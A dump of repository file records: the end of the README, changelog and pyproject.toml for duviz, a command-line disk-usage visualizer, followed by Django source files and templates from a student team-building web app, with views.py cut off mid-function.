[____785.31MB____][421.56MB][]| | || | | ||||||||[231] [21]\n [gc][][]||||||||||||||||||||[] | ||| | [Ve] ||[]\n [17][][]||||||||||||||||||||[] | ||| | [23] ||[]\n\n\nFeatures\n--------\n\n- Basically it consists of just one Python 3 script ``duviz.py``.\n No installation required: put it where you want it. Use it how you want it.\n- Only uses standard library and just depends on ``du`` and ``ls`` utilities,\n which are available out of the box on a typical Unix platform (Linux, macOS)\n- Speed. No need to wait for a GUI tool to get up and running, let alone scanning your disk.\n The hard work is done by ``du`` (or ``ls``), which run an C-speed.\n- Progress reporting while you wait. Be hypnotized!\n- Detects your terminal width for maximum visualization pleasure.\n- Not only supports \"disk usage\" based on file size,\n but also allows to count files (inode count mode)\n or give a size breakdown of ZIP or tar files.\n- Option to use terminal colors for the boxes instead of ASCII art\n\n\nInstallation\n------------\n\nPip based\n duviz can be installed with pip in a desired virtual environment::\n\n pip install duviz\n\n which will install a ``duviz`` command line utility in your environment.\n\n If you already have `pipx <https://pypa.github.io/pipx/>`_ on your toolbelt,\n you might prefer to install duviz in an automatically managed,\n isolated environment with ``pipx install duviz``.\n\nWith Homebrew\n duviz can also be installed with `Homebrew <https://brew.sh/>`_\n through the `soxofaan/duviz <https://github.com/soxofaan/homebrew-duviz>`_ tap::\n\n brew install soxofaan/duviz/duviz\n\nNo installation\n The file ``duviz.py`` is also designed to be usable as a standalone Python script,\n without having to install it.\n Download ``duviz.py`` and just run it::\n\n python path/to/duviz.py\n\n\nPython 2 Support\n~~~~~~~~~~~~~~~~\n\n``duviz`` was originally (2009) a Python 2 script, and started supporting Python 3 around 2016.\nWith the end of life of Python 2 nearing in 2019, support for Python 2 was dropped.\nThe Python 2 compatible version can be found in the ``py2-compatible`` branch (last release: 1.1.1).\n\nUsage\n-----\n\nIf you run ``duviz`` without arguments, it will render the disk usage of the current working folder.\nIf you specify one or more directories, it will render the usage of those directories, how intuitive is that!\n\nInstead of size in bytes, you can also get inode usage: just use the option ``--inodes`` (or ``-i`` in short).\n\nIf you directly pass ``duviz`` a ZIP or tar file,\nit will visualize the size breakdown of the file tree in the ZIP/tar file.\nIn case of ZIP files, the compressed size will be shown by default\n(option ``--unzip-size`` will toggle showing of decompressed size).\nFor tar files, only the decompressed size is available.\n\nRun it with option ``--help`` for more options.\n"
},
{
"alpha_fraction": 0.6419752836227417,
"alphanum_fraction": 0.7114197611808777,
"avg_line_length": 27.573530197143555,
"blob_id": "096ff5f441d5ef00d56deb4ac53c525d40d0224d",
"content_id": "36ad382f3d13dee202fe0732658103c3e5dd6786",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1944,
"license_type": "permissive",
"max_line_length": 103,
"num_lines": 68,
"path": "/CHANGELOG.md",
"repo_name": "soxofaan/duviz",
"src_encoding": "UTF-8",
"text": "\n# Duviz Changelog\n\n\n## [Unreleased]\n\n- Migrate to `pyproject.toml` based project metadata\n and `hatchling` based packaging\n ([#15](https://github.com/soxofaan/duviz/issues/15))\n- Bring back CLI option `--version` to show current version.\n ([#29](https://github.com/soxofaan/duviz/issues/29))\n\n\n## [3.2.0] - 2022-12-18\n\n- Replace `optparse` usage with `argparse`\n ([#10](https://github.com/soxofaan/duviz/issues/10))\n- Drop Python 3.5 support ([#27](https://github.com/soxofaan/duviz/issues/27))\n- New feature: size breakdown of ZIP and tar files ([#20](https://github.com/soxofaan/duviz/issues/20))\n\n\n## [3.1.2] - 2022-12-09\n\n- Add test runs for Python 3.10 and 3.11\n- Add more type hinting\n- Add `pipx` installation instructions ([#23](https://github.com/soxofaan/duviz/issues/23))\n- Start using `pre-commit` for automated code style issue detection and fixing\n- Start using `darker` for incrementally applying \"black\" code style\n ([#21](https://github.com/soxofaan/duviz/issues/21))\n\n\n## [3.1.1] - 2022-09-01\n\n- Replace Travis CI with GitHub Actions\n\n\n## [3.1.0] - 2019-11-12\n\n- Add option `--color` to render with old-fashioned ANSI colors\n instead of old-fashioned ASCII art\n- Start using pytest for unit tests\n- Bring back progress reporting after 3.0.0 refactor\n\n\n## [3.0.0] - 2019-10-20\n\n- Refactor size tree code for better encapsulation\n- Refactor render code to allow different render styles\n- Start using type hinting\n- Add option `--one-line` to do \"single line bar\" rendering\n\n\n## [2.0.1] - 2019-10-20\n\n- Replace custom terminal size detection code with `shutil.get_terminal_size` (Issue #6)\n- Trying out https://deepsource.io/ for static code analysis\n- Add Travis run for Python 3.8 (instead of 3.8-dev)\n\n\n## [2.0.0] - 2019-10-20\n\n- Dropped Python 2 support\n- Python 3 related code cleanups and fine-tuning\n\n\n## [1.1.1] - 2019-10-20\n\n- Probably last release supporting Python 2\n- Added Homebrew formula and instructions\n"
},
{
"alpha_fraction": 0.6233283877372742,
"alphanum_fraction": 0.639673113822937,
"avg_line_length": 22.61403465270996,
"blob_id": "e7775876e27f38ac9472145bc2b708465559e89a",
"content_id": "88289abae0ba7b0407a08828d0fae4b424458bd9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "TOML",
"length_bytes": 1346,
"license_type": "permissive",
"max_line_length": 58,
"num_lines": 57,
"path": "/pyproject.toml",
"repo_name": "soxofaan/duviz",
"src_encoding": "UTF-8",
"text": "[project]\nname = \"duviz\"\ndescription = \"Command line disk space visualization tool\"\nreadme = \"README.rst\"\nlicense = \"MIT\"\nauthors = [\n { name = \"Stefaan Lippens\", email = \"[email protected]\" },\n]\ndynamic = [\"version\"]\nrequires-python = \">=3.5\"\nclassifiers = [\n \"Development Status :: 5 - Production/Stable\",\n \"Intended Audience :: Developers\",\n \"Intended Audience :: System Administrators\",\n \"Topic :: System :: Systems Administration\",\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Python :: 3.8\",\n \"Programming Language :: Python :: 3.9\",\n \"Programming Language :: Python :: 3.10\",\n \"Programming Language :: Python :: 3.11\",\n \"Programming Language :: Python :: 3 :: Only\",\n]\nkeywords = [\n \"disk usage\",\n \"visualization\",\n \"ascii-art\",\n \"cli\",\n]\n\n[project.urls]\nHomepage = \"https://github.com/soxofaan/duviz\"\nSource = \"https://github.com/soxofaan/duviz\"\nTracker = \"https://github.com/soxofaan/duviz/issues\"\n\n[project.scripts]\nduviz = \"duviz:main\"\n\n\n[build-system]\nrequires = [\"hatchling\"]\nbuild-backend = \"hatchling.build\"\n\n[tool.hatch.version]\nsource = \"regex\"\npath = \"duviz.py\"\n\n[tool.hatch.build]\ninclude = [\n \"duviz.py\",\n]\n\n\n[tool.black]\nline-length = 120\n"
}
] | 5 |
vmilasin/zavrsni_rad | https://github.com/vmilasin/zavrsni_rad | 9def73d79e1aca65ba3f8d72e4734eea52b506a4 | 521b88d541baf9f9eec7cd7f3ef0c92eba784eba | cece4e25ba5733f935fab5c0ef22db2b130281eb | refs/heads/master | 2020-12-30T13:46:03.981932 | 2017-05-14T14:33:18 | 2017-05-14T14:33:18 | 61,121,584 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6363636255264282,
"alphanum_fraction": 0.6573852300643921,
"avg_line_length": 87.91802978515625,
"blob_id": "d02b5241729abd8b859d88ac56c4a3c7825613b2",
"content_id": "a7afc0544c0f5b7cb0d3408f8828f21f2fd748ed",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5423,
"license_type": "no_license",
"max_line_length": 168,
"num_lines": 61,
"path": "/lfg_app/urls.py",
"repo_name": "vmilasin/zavrsni_rad",
"src_encoding": "UTF-8",
"text": "from django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n\turl(r'^$', views.index, name='index'),\n\turl(r'^registration/$', views.registration, name='registration'),\n\turl(r'^registration_in_use/$', views.registration_in_use, name='registration_in_use'),\n\turl(r'^registration_success/$', views.registration_success, name='registration_success'),\n\turl(r'^login/disabled/$', views.account_disabled, name='account_disabled'),\n\turl(r'^login/$', views.login, name='login'),\n\turl(r'^logout/$', views.logout, name='logout'),\n\turl(r'^start/$', views.start, name='start'),\n\turl(r'^user_management/$', views.user_management, name='user_management'),\n\turl(r'^user_about_me/(?P<user_id>[0-9]+)/$', views.user_about_me, name='user_about_me'),\n\turl(r'^user_overview/(?P<user_id>[0-9]+)/$', views.user_overview, name='user_overview'),\t\n\turl(r'^del_user_status/(?P<status_id>[0-9]+)/$', views.del_user_status, name='del_user_status'),\n\turl(r'^user_friends/(?P<user_id>[0-9]+)/$', views.user_friends, name='user_friends'),\n\turl(r'^user_requests/$', views.user_requests, name='user_requests'),\n\turl(r'^friendship_processing/(?P<request_id>[0-9]+)/(?P<accepted>[0-9]+)/$', views.friendship_processing, name='friendship_processing'),\n\turl(r'^unfriend/(?P<request_id>[0-9]+)/$', views.unfriend, name='unfriend'),\n\turl(r'^user_teams/(?P<user_id>[0-9]+)/$', views.user_teams, name='user_teams'),\n\turl(r'^user_invitations/$', views.user_invitations, name='user_invitations'),\n\turl(r'^invitation_processing/(?P<request_id>[0-9]+)/(?P<accepted>[0-9]+)/$', views.invitation_processing, name='invitation_processing'),\n\turl(r'^leave_team/(?P<membership_id>[0-9]+)/$', views.leave_team, name='leave_team'),\n\turl(r'^user_reviews/(?P<user_id>[0-9]+)/$', views.user_reviews, name='user_reviews'),\n\turl(r'^review_user/(?P<user_reviewed>[0-9]+)/$', views.review_user, name='review_user'),\n\turl(r'^review_team/(?P<team_id>[0-9]+)/$', views.review_team, name='review_team'),\n\turl(r'^user_inbox/$', views.user_inbox, name='user_inbox'),\n\turl(r'^user_outbox/$', views.user_outbox, name='user_outbox'),\n\turl(r'^message_compose/(?P<reciever_id>[0-9]+)/$', views.message_compose, name='message_compose'),\n\turl(r'^message_read/(?P<message_id>[0-9]+)/$', views.message_read, name='message_read'),\n\turl(r'^search_category/$', views.search_category, name='search_category'),\n\turl(r'^search_subcategory/(?P<category_id>[0-9]+)/$', views.search_subcategory, name='search_subcategory'),\n\turl(r'^search_teams_in_cat/(?P<category_id>[0-9]+)/(?P<subcategory>[0-9]+)/$', views.search_teams_in_cat, name='search_teams_in_cat'),\n\turl(r'^search_teams/$', views.search_teams, name='search_teams'),\n\turl(r'^search_users/$', views.search_users, name='search_users'),\n\turl(r'^team_creation/$', views.team_creation, name='team_creation'),\n\turl(r'^team_creation_success/(?P<team_id>[0-9]+)/$', views.team_creation_success, name='team_creation_success'),\n\turl(r'^team_management/(?P<team_id>[0-9]+)/$', views.team_management, name='team_management'),\n\turl(r'^team_about_us/(?P<team_id>[0-9]+)/$', views.team_about_us, name='team_about_us'),\n\turl(r'^team_overview/(?P<team_id>[0-9]+)/$', views.team_overview, name='team_overview'),\n\turl(r'^del_team_status/(?P<team_id>[0-9]+)/(?P<status_id>[0-9]+)/$', views.del_team_status, name='del_team_status'),\n\turl(r'^team_members/(?P<team_id>[0-9]+)/$', views.team_members, name='team_members'),\n\turl(r'^team_membership_management/(?P<team_id>[0-9]+)/(?P<member_id>[0-9]+)/$', views.team_membership_management, name='team_membership_management'),\n\turl(r'^kick_member/(?P<team_id>[0-9]+)/(?P<member_id>[0-9]+)/$', views.kick_member, name='kick_member'),\n\turl(r'^team_invitation/(?P<team_id>[0-9]+)/$', views.team_invitation, name='team_invitation'),\n\turl(r'^team_invitation_creation/(?P<team_id>[0-9]+)/(?P<user_id>[0-9]+)/$', views.team_invitation_creation, name='team_invitation_creation'),\n\turl(r'^team_tasks/(?P<team_id>[0-9]+)/$', views.team_tasks, name='team_tasks'),\n\turl(r'^team_tasks_creation/(?P<team_id>[0-9]+)/$', views.team_tasks_creation, name='team_tasks_creation'),\n\turl(r'^task_finish/(?P<team_id>[0-9]+)/(?P<task_id>[0-9]+)/$', views.task_finish, name='task_finish'),\n\turl(r'^team_subtasks/(?P<team_id>[0-9]+)/(?P<task_id>[0-9]+)/$', views.team_subtasks, name='team_subtasks'),\n\turl(r'^team_subtasks_creation/(?P<team_id>[0-9]+)/(?P<task_id>[0-9]+)/$', views.team_subtasks_creation, name='team_subtasks_creation'),\n\turl(r'^subtask_finish/(?P<team_id>[0-9]+)/(?P<task_id>[0-9]+)/(?P<subtask_id>[0-9]+)/$', views.subtask_finish, name='subtask_finish'),\n\turl(r'^team_reviews/(?P<team_id>[0-9]+)/$', views.team_reviews, name='team_reviews'),\n\turl(r'^team_forum/(?P<team_id>[0-9]+)/$', views.team_forum, name='team_forum'),\n\turl(r'^team_forum_creation/(?P<team_id>[0-9]+)/$', views.team_forum_creation, name='team_forum_creation'),\n\turl(r'^team_forum_threads/(?P<team_id>[0-9]+)/(?P<forum_id>[0-9]+)/$', views.team_forum_threads, name='team_forum_threads'),\n\turl(r'^team_forum_threads_creation/(?P<team_id>[0-9]+)/(?P<forum_id>[0-9]+)/$', views.team_forum_threads_creation, name='team_forum_threads_creation'),\t\n\turl(r'^team_forum_posts/(?P<team_id>[0-9]+)/(?P<forum_id>[0-9]+)/(?P<thread_id>[0-9]+)/$', views.team_forum_posts, name='team_forum_posts'),\n\turl(r'^team_forum_posts_creation/(?P<team_id>[0-9]+)/(?P<forum_id>[0-9]+)/(?P<thread_id>[0-9]+)/$', views.team_forum_posts_creation, name='team_forum_posts_creation'),\n]"
},
{
"alpha_fraction": 0.7022222280502319,
"alphanum_fraction": 0.7022222280502319,
"avg_line_length": 17.75,
"blob_id": "dc64ef95e7c4ce0afb3254b1a4b3163b1857521c",
"content_id": "f0f66ecc015b46280883a344dc85d9527979786e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 225,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 12,
"path": "/pip_install.py",
"repo_name": "vmilasin/zavrsni_rad",
"src_encoding": "UTF-8",
"text": "import pip\nfrom subprocess import call\n\nrequirements = []\n\nr = open('requirements.txt', 'r')\nfor line in r:\n requirements.append(line)\nr.close()\n\nfor package in requirements:\n call(\"pip install \" + package, shell=True)\n"
},
{
"alpha_fraction": 0.47074466943740845,
"alphanum_fraction": 0.47429078817367554,
"avg_line_length": 32.20588302612305,
"blob_id": "dee5750d8f9189b155d1f2dc40e34eb843cd7c4b",
"content_id": "92c6d6b65dd3368c112297a71403db4eb0dce6f5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 1128,
"license_type": "no_license",
"max_line_length": 207,
"num_lines": 34,
"path": "/lfg_app/templates/lfg_app/user_reviews.html",
"repo_name": "vmilasin/zavrsni_rad",
"src_encoding": "UTF-8",
"text": "{% extends \"base_start_user.html\" %}\n{% load staticfiles %}\n\n{% block data %}\n<div class=\"context\">\n <h1>Reviews:</h1>\n <div class=\"context_data\">\n <ul>\n {% for result in pages %}\n <l1>\n <div class=\"post\">\n <div class=\"post_user\"><p>{{ result.reviewed_by.first_name|title }} {{ result.reviewed_by.last_name|title }} ({{ result.date_created|date:\"d.m.Y. H:i\" }}): {{ result.rating }}</p></div>\n <div class=\"post_content\"><pre>{{ result.content }}</pre></div>\n </div>\n </l1>\n {% endfor %}\n </ul>\n <br>\n </div>\n\t<div class=\"pagination\">\n \t<span class=\"step-links\">\n \t{% if pages.has_previous %}\n \t<a href=\"?page={{ pages.previous_page_number }}\">Previous</a>\n \t{% endif %}\n \t<span class=\"current\">\n \tPage {{ pages.number }} of {{ pages.paginator.num_pages }}.\n \t</span>\n \t{% if pages.has_next %}\n \t<a href=\"?page={{ pages.next_page_number }}\">Next</a>\n \t{% endif %}\n \t</span>\n\t</div>\n</div>\n{% endblock data %}"
},
{
"alpha_fraction": 0.7629716992378235,
"alphanum_fraction": 0.7676886916160583,
"avg_line_length": 29.321428298950195,
"blob_id": "8a3f7c61bc7fcfd34ffc54ebd424a8c327b12f81",
"content_id": "a5a7b86342baa504bbb7e741e2d7f3975ed6b581",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 848,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 28,
"path": "/lfg/wsgi.py",
"repo_name": "vmilasin/zavrsni_rad",
"src_encoding": "UTF-8",
"text": "\"\"\"\nWSGI config for lfg project.\n\nIt exposes the WSGI callable as a module-level variable named ``application``.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.8/howto/deployment/wsgi/\n\"\"\"\n\nimport os\nimport sys\nimport site\nfrom django.core.wsgi import get_wsgi_application\n\nos.environ[\"DJANGO_SETTINGS_MODULE\"] = \"lfg.settings\"\n\napplication = get_wsgi_application()\n\n# Add the site-packages of the chosen virtualenv to work with\nsite.addsitedir('~/.virtualenvs/lfg/lib/python2.7/site-packages')\n\n# Add the app's directory to the PYTHONPATH\nsys.path.append('/home/vlafa/Desktop/Projekti/lfg_project')\nsys.path.append('/home/vlafa/Desktop/Projekti/lfg_project/lfg')\n\n# Activate your virtual env\nactivate_env=os.path.expanduser(\"~/.virtualenvs/lfg/bin/activate_this.py\")\nexecfile(activate_env, dict(__file__=activate_env))"
},
{
"alpha_fraction": 0.6986541748046875,
"alphanum_fraction": 0.7053832411766052,
"avg_line_length": 22.258502960205078,
"blob_id": "a3a93d97649d52bfeb453abf776e5a9fd85bbc66",
"content_id": "3e324c87a46fa673ee31af84cd82fd7d19215206",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3418,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 147,
"path": "/lfg_app/forms.py",
"repo_name": "vmilasin/zavrsni_rad",
"src_encoding": "UTF-8",
"text": "from django import forms\nfrom . import models\nfrom django.contrib.auth.models import User\nfrom django.forms import extras\n\n\nclass UserSearchForm(forms.Form):\n\tusername = forms.CharField()\n\nclass TeamSearchForm(forms.Form):\n\tteam = forms.CharField()\n\nclass CategorySearchForm(forms.Form):\n\tcategory = forms.CharField()\n\nclass SubCategorySearchForm(forms.Form):\n\tsubcategory = forms.CharField()\n\n\nclass LoginForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = User\n\t\tfields = ['username', 'password']\n\t\thelp_texts = {\n\t\t\t'username':'',\n\t\t\t'password':''\n\t\t}\n\t\tlabels = {\n\t\t\t'username':'',\n\t\t\t'password':''\n\t\t}\n\t\twidgets = {\n\t\t\t'username': forms.TextInput(attrs = {'placeholder': 'Username'}),\n\t\t\t'password': forms.PasswordInput(attrs = {'placeholder': 'Password'}),\n\t\t}\n\nclass UserRegistrationForm(forms.ModelForm):\t\n\tclass Meta:\n\t\tmodel = User\n\t\tfields = ['username', 'password', 'email', 'first_name', 'last_name']\n\t\thelp_texts = {\n\t\t\t'username':'',\n\t\t\t'password':'',\n\t\t\t'email':'',\n\t\t\t'first_name':'',\n\t\t\t'last_name':''\n\t\t}\n\n\nclass UserManagementForm(forms.Form):\n\tfirst_name = forms.CharField(required=False, max_length=256)\n\tlast_name = forms.CharField(required=False, max_length=256)\n\tbirthday = forms.DateField(required=False, widget=extras.SelectDateWidget(years=range(1930,2015)))\n\temail = forms.EmailField(required=False)\n\tcountry = forms.CharField(required=False, max_length=100)\n\tcity = forms.CharField(required=False, max_length=100)\n\taddress = forms.CharField(required=False, max_length=200)\n\timage = forms.ImageField(required=False)\n\tabout_me = forms.CharField(required=False, widget=forms.Textarea)\n\n\nclass NewCategoryForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = models.Category\n\t\tfields = ['category']\n\nclass NewSubcategoryForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = models.SubCategory\n\t\tfields = ['subcategory']\n\n\nclass TeamCreationForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = models.TeamProfile\n\t\tfields = ['name', 'category', 'description']\n\nclass TeamManagementForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = models.TeamProfile\n\t\tfields = ['name', 'recruiting', 'country', 'city', 'address', 'image', 'description']\n\nclass MembershipManagementForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = models.Membership\n\t\tfields = ['user_type']\n\n\nclass TaskForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = models.Tasks\n\t\tfields = ['task', 'description', 'priority']\n\nclass SubTaskForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = models.SubTasks\n\t\tfields = ['subtask', 'description']\t\t\n\n\nclass ForumForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = models.Forum\n\t\tfields = ['title']\n\nclass ThreadForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = models.Thread\n\t\tfields = ['title']\n\nclass PostForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = models.Post\n\t\tfields = ['title', 'content']\n\n\nclass MessageForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = models.Message\n\t\tfields = ['title', 'content']\n\n\nclass UserReviewForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = models.UserReview\n\t\tfields = ['rating', 'content']\n\nclass TeamReviewForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel= models.TeamReview\n\t\tfields = ['rating', 'content']\n\n\nclass UserStatusForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = models.UserStatus\n\t\tfields = ['content']\n\t\tlabels = {\n\t\t\t'content' : 'Post a new status:'\n\t\t}\n\nclass TeamStatusForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = models.TeamStatus\n\t\tfields = ['content']\n\t\tlabels = {\n\t\t\t'content' : 'Post a new status:'\n\t\t}"
},
{
"alpha_fraction": 0.6116279363632202,
"alphanum_fraction": 0.6162790656089783,
"avg_line_length": 29.785715103149414,
"blob_id": "4236fbb8c8d3c198df9e87022fe9093f0814836e",
"content_id": "134e18b75987e76fcfb0770150f87baac335f1a0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 430,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 14,
"path": "/lfg_app/templates/lfg_app/message_compose.html",
"repo_name": "vmilasin/zavrsni_rad",
"src_encoding": "UTF-8",
"text": "{% extends \"base_start_user.html\" %}\n\n{% block data %}\n<div class=\"context\">\n\t<h1>Message to {{ requested_reciever.first_name|title }} {{ requested_reciever.last_name|title }}:</h1>\n\t<div class=\"form\">\n\t\t<form action=\"{% url 'message_compose' requested_reciever.id %}\", method=\"POST\">\n\t\t {% csrf_token %}\n\t\t {{ message_compose_form }}\n\t\t <input type=\"submit\" value=\"Submit\">\n\t </form>\t\t\n\t</div>\n</div>\n{% endblock data %}"
},
{
"alpha_fraction": 0.7566727995872498,
"alphanum_fraction": 0.7576187252998352,
"avg_line_length": 46.406578063964844,
"blob_id": "6ace74f25886179a8ce3ed5024663498ca0e49cf",
"content_id": "e8258a8f774adca73b4e681602cdf2cc4928d3c0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 63429,
"license_type": "no_license",
"max_line_length": 412,
"num_lines": 1338,
"path": "/lfg_app/views.py",
"repo_name": "vmilasin/zavrsni_rad",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\nfrom django.http import HttpResponseRedirect\nfrom django.core.urlresolvers import reverse\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.contrib.auth import authenticate, login as auth_login, logout as auth_logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User\nfrom . import forms\nfrom . import models\nimport os\nfrom django.conf import settings\nfrom django.db.models import Q\n\n\ndef index(request):\n\tif request.method=='POST':\n\t\tlogin_form = forms.LoginForm(request.POST)\n\t\tusername = request.POST['username']\n\t\tpassword = request.POST['password']\n\t\tuser = authenticate(username=username, password=password)\n\t\tif user is not None:\n\t\t\tif user.is_active:\n\t\t\t\tauth_login(request, user)\n\t\t\t\treturn HttpResponseRedirect(reverse('user_overview', args=(user.id,)))\n\t\t\telse:\n\t\t\t\treturn HttpResponseRedirect('/teambuilder/account_disabled/')\n\t\telse:\n\t\t\treturn HttpResponseRedirect('/teambuilder/')\n\telse:\n\t\tlogin_form = forms.LoginForm()\n\t\n\tregistration_form = forms.UserRegistrationForm()\n\n\treturn render(request, 'index.html', {'login_form':login_form, 'registration_form':registration_form})\n\n\ndef registration(request):\n\tif request.method=='POST':\n\t\tregistration_form = forms.UserRegistrationForm(request.POST)\n\t\tif registration_form.is_valid():\n\t\t\ttry:\n\t\t\t\tuser = User.objects.get(username=request.POST['username'])\n\t\t\t\treturn HttpResponseRedirect('/teambuilder/registration_in_use/')\n\t\t\texcept User.DoesNotExist:\n\t\t\t\tnew_user = User.objects.create_user(username=request.POST['username'], email=request.POST['email'], password=request.POST['password'], first_name=request.POST['first_name'], last_name=request.POST['last_name'])\n\t\t\t\tnew_userprofile = User.objects.get(username=request.POST['username'])\n\t\t\t\tnew_user_userprofile = models.UserProfile.objects.create(user=new_userprofile)\n\t\t\t\tos.mkdir(os.path.join(settings.BASE_DIR, 'lfg_app', 'static', 'images', 'user_images', request.POST['username']))\n\t\t\t\treturn HttpResponseRedirect('/teambuilder/registration_success/')\n\telse:\n\t\tregistration_form = forms.UserRegistrationForm()\n\n\treturn render(request, 'registration.html', {'registration_form':registration_form})\n\n\ndef logout(request):\n\tauth_logout(request)\n\treturn HttpResponseRedirect('/teambuilder/')\n\ndef login(request):\n\tlogin_form = forms.LoginForm()\n\treturn render(request, 'login.html', {'login_form':login_form})\n\ndef registration_success(request):\n\treturn render(request, 'registration_success.html',)\n\ndef registration_in_use(request):\n\treturn render(request, 'registration_in_use.html')\n\ndef account_disabled(request):\n\treturn render(request, 'account_disabled.html',)\n\n\n@login_required\ndef start(request):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\n\treturn render(request, 'start.html', {'logged_in_user':logged_in_user, 'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count})\n\n\n@login_required\ndef user_management(request):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\t\n\tuser = logged_in_user\n\tuser_profile = models.UserProfile.objects.get(user=user)\n\n\tif request.method == 'POST':\n\t\tuser_management_form = forms.UserManagementForm(request.POST, request.FILES)\n\t\tif user_management_form.is_valid():\n\t\t\tuser.first_name = request.POST['first_name']\n\t\t\tuser.last_name = request.POST['last_name']\n\t\t\tuser.email = request.POST['email']\n\t\t\tuser_profile.birthday = user_management_form.cleaned_data.get('birthday')\n\t\t\tuser_profile.country = request.POST['country']\n\t\t\tuser_profile.city = request.POST['city']\n\t\t\tuser_profile.address = request.POST['address']\n\t\t\tuser_profile.image = request.FILES.get('image', 'default_images/default_user_img.png')\n\t\t\tuser_profile.about_me = request.POST['about_me']\n\t\t\tuser.save()\n\t\t\tuser_profile.save()\n\t\t\treturn HttpResponseRedirect(reverse('user_about_me', args=(logged_in_user.id,)))\n\telse:\n\t\tuser_management_form = forms.UserManagementForm(initial={'email':user.email, 'first_name':user.first_name, 'last_name':user.last_name, 'birthday':user.userprofile.birthday, 'country':user.userprofile.country, 'city':user.userprofile.city, 'address':user.userprofile.address, 'image':user.userprofile.image, 'about_me':user.userprofile.about_me})\n\t\n\treturn render(request, 'user_management.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'user_management_form':user_management_form})\n\n\n@login_required\ndef user_about_me(request, user_id):\n\trequested_user = User.objects.get(id=user_id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\t\n\treturn render(request, 'user_about_me.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'requested_user':requested_user})\n\n\n@login_required\ndef user_overview(request, user_id):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\trequested_user = User.objects.get(id=user_id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\t\n\tuser_status_list = models.UserStatus.objects.filter(user=requested_user)\n\n\ttry:\t\n\t\tfriendship_request_sent = models.Friendship.objects.get(Q(user=requested_user, friend=logged_in_user) | Q(user=logged_in_user, friend=requested_user))\n\texcept models.Friendship.DoesNotExist:\n\t\tfriendship_request_sent = None\n\n\tif 'friendship_request' in request.GET:\n\t\tfriendship_request = models.Friendship.objects.create(user=requested_user, friend=logged_in_user)\n\t\tfriendship_request.save()\n\t\treturn HttpResponseRedirect(reverse('user_overview', args=(requested_user.id,)))\n\telse:\n\t\tfriendship_request = False\n\n\tif request.method == 'POST':\n\t\tuser_status_form = forms.UserStatusForm(request.POST)\n\t\tif user_status_form.is_valid():\n\t\t\tstatus = models.UserStatus.objects.create(user=logged_in_user, content=request.POST['content'])\n\t\t\tstatus.save()\n\t\treturn 